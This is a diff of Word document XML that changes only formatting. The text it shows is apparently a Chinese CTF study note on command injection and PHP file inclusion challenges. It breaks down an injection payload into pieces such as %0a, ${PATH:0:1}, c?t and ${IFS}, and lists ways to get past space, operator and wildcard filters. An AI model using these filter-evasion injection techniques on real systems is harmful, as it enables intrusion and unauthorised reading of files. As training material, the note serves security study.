+        <w:t>题型：命令注入-无过滤</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10002,7 +9650,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>2</w:t>
@@ -10017,15 +9664,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>题型：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>eval 代码执行</w:t>
+        <w:t>题型：eval 代码执行</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10087,7 +9726,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>3</w:t>
@@ -10102,15 +9740,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>题型：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>过滤 cat</w:t>
+        <w:t>题型：过滤 cat</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10210,7 +9840,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>4</w:t>
@@ -10225,15 +9854,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>题型：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>过滤空格</w:t>
+        <w:t>题型：过滤空格</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10295,7 +9916,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>5</w:t>
@@ -10310,15 +9930,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>题型：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>过滤目录分隔符</w:t>
+        <w:t>题型：过滤目录分隔符</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10388,7 +10000,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>6</w:t>
@@ -10403,15 +10014,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>题型：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>过滤运算符</w:t>
+        <w:t>题型：过滤运算符</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10487,7 +10090,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>7</w:t>
@@ -10502,15 +10104,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>题型：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>综合练习</w:t>
+        <w:t>题型：综合练习</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10598,7 +10192,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>8 个过滤项：</w:t>
@@ -10611,7 +10204,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>1</w:t>
@@ -10648,7 +10240,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>2</w:t>
@@ -10693,7 +10284,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>3</w:t>
@@ -10738,7 +10328,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>4</w:t>
@@ -10783,7 +10372,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>5</w:t>
@@ -10843,7 +10431,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>6</w:t>
@@ -10888,7 +10475,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>7</w:t>
@@ -10907,11 +10493,11 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`flag`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>flag</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10933,7 +10519,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>8</w:t>
@@ -10978,7 +10563,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>最终 payload：</w:t>
@@ -11010,7 +10594,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>逐段拆解：</w:t>
@@ -11022,11 +10605,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`%0a`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>%0a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11057,11 +10640,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`${PATH:0:1}`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>${PATH:0:1}</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11085,11 +10668,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`bin`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>bin</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11113,11 +10696,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`c?t`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>c?t</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11163,11 +10746,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`${IFS}`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>${IFS}</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11183,11 +10766,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`f?ag_is_here`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>f?ag_is_here</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11233,11 +10816,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`*`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>*</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11254,7 +10837,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>展开后：</w:t>
@@ -11301,7 +10883,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>文件包含 1</w:t>
@@ -11389,10 +10970,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>文件包含 2（必须 `php://`）</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">文件包含 2（必须 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>php://</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11469,10 +11064,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>文件包含 3（必须 `php://`，flag 路径已知）</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">文件包含 3（必须 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>php://</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>，flag 路径已知）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11534,7 +11143,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>文件包含 4（无 shell.txt）</w:t>
@@ -11637,17 +11245,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>目标</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：让 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">目标：让 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11671,18 +11271,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`${IFS}`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>${IFS}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11714,15 +11307,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">实测：✅ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>最稳</w:t>
+        <w:t>实测：✅ 最稳</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11731,11 +11316,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`$IFS$9`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>$IFS$9</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11776,11 +11361,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`$IFS`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>$IFS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11822,7 +11407,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>花括号</w:t>
@@ -11867,10 +11451,17 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>重定向 `&lt;`</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">重定向 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11912,10 +11503,17 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>制表符 `%09`</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">制表符 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>%09</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11956,11 +11554,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`$'\t'`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>$'\t'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12001,11 +11599,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`$'\x20'`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>$'\x20'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12047,7 +11645,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>⚠️ 反直觉的实测结果：</w:t>
@@ -12134,18 +11731,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`${IFS}` 是什么</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>${IFS}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 是什么：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12170,10 +11767,17 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>为什么必须加 `{}`</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">为什么必须加 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>{}</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12238,17 +11842,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**反斜杠</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>反斜杠</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12290,7 +11886,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>单/双引号</w:t>
@@ -12350,7 +11945,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>变量拼接</w:t>
@@ -12395,10 +11989,17 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>通配 `?`</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">通配 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12440,10 +12041,17 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>通配 `*`</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">通配 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>*</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12500,7 +12108,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>命令替换</w:t>
@@ -12545,7 +12152,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>反引号</w:t>
@@ -12612,10 +12218,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>⚠️ `*` 的坑（实测）：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">⚠️ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 的坑（实测）：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12658,17 +12278,39 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>所以 `?` 比 `*` 安全</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">所以 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 比 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 安全：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12693,7 +12335,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>⚠️ 通配符必须有"目录上下文"：</w:t>
@@ -12739,7 +12380,6 @@
       <w:r>
         <w:rPr>
